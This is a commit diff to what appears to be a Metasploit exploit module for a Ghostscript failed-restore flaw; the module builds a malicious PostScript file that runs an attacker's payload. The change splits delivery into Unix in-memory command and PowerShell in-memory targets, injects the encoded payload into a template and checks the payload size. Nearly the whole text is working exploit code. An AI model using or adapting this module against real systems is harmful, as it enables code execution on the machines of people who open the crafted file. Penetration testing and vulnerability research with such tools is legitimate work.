Refactor targets to align with current style

2018-09-05 18:23:36 -05:00 · 2018-09-05 18:23:36 -05:00 · 61044e8bca
parent 692ddc8b8b
commit 61044e8bca
1 changed files with 23 additions and 12 deletions
--- a/modules/exploits/multi/fileformat/ghostscript_failed_restore.rb
+++ b/modules/exploits/multi/fileformat/ghostscript_failed_restore.rb
@ -42,13 +42,23 @@ class MetasploitModule < Msf::Exploit
      'Arch'           => [ARCH_CMD, ARCH_X86, ARCH_X64],
      'Privileged'     => false,
      'Targets'        => [
-        ['PS file', template: 'msf.ps']
+        ['Unix (In-Memory)',
+         'Platform'    => 'unix',
+         'Arch'        => ARCH_CMD,
+         'Type'        => :unix_memory,
+         'Payload'     => {'Space' => 4089, 'DisableNops' => true} # 4096 total
+        ],
+        ['PowerShell (In-Memory)',
+         'Platform'    => 'win',
+         'Arch'        => [ARCH_X86, ARCH_X64],
+         'Type'        => :psh_memory
+        ]
      ],
      'DefaultTarget'  => 0
    ))

    register_options([
-      OptString.new('FILENAME', [true, 'Output file', 'msf.pdf']) # Fake PDF
+      OptString.new('FILENAME', [true, 'Output file', 'msf.ps'])
    ])
  end

@ -59,17 +69,18 @@ class MetasploitModule < Msf::Exploit
    sploit.sub!(PLACEHOLDER_STRING, Rex::Text.rand_text_alphanumeric(8..42))

    # Replace our test payload with the real one
-    case payload.arch.first
-    when ARCH_CMD
+    case target['Type']
+    when :unix_memory
      sploit.sub!(PLACEHOLDER_COMMAND, payload.encoded)
-    when ARCH_X86, ARCH_X64
-      # Futureproof in case unix gets x{86,64}
-      if payload_instance.platform_to_s == 'Windows'
-        sploit.sub!(
-          PLACEHOLDER_COMMAND,
-          cmd_psh_payload(payload.encoded, payload.arch, remove_comspec: true)
-        )
+    when :psh_memory
+      psh = cmd_psh_payload(payload.encoded, payload.arch, remove_comspec: true)
+
+      # XXX: Payload space applies to the payload, not the PSH command
+      if psh.length > targets[0].payload_space
+        fail_with(Failure::BadConfig, 'Please choose a smaller payload')
      end
+
+      sploit.sub!(PLACEHOLDER_COMMAND, psh)
    end

    file_create(sploit)
@ -77,7 +88,7 @@ class MetasploitModule < Msf::Exploit

  def template
    File.read(File.join(
-      Msf::Config.data_directory, 'exploits', 'ghostscript', target[:template]
+      Msf::Config.data_directory, 'exploits', 'ghostscript', 'msf.ps'
    ))
  end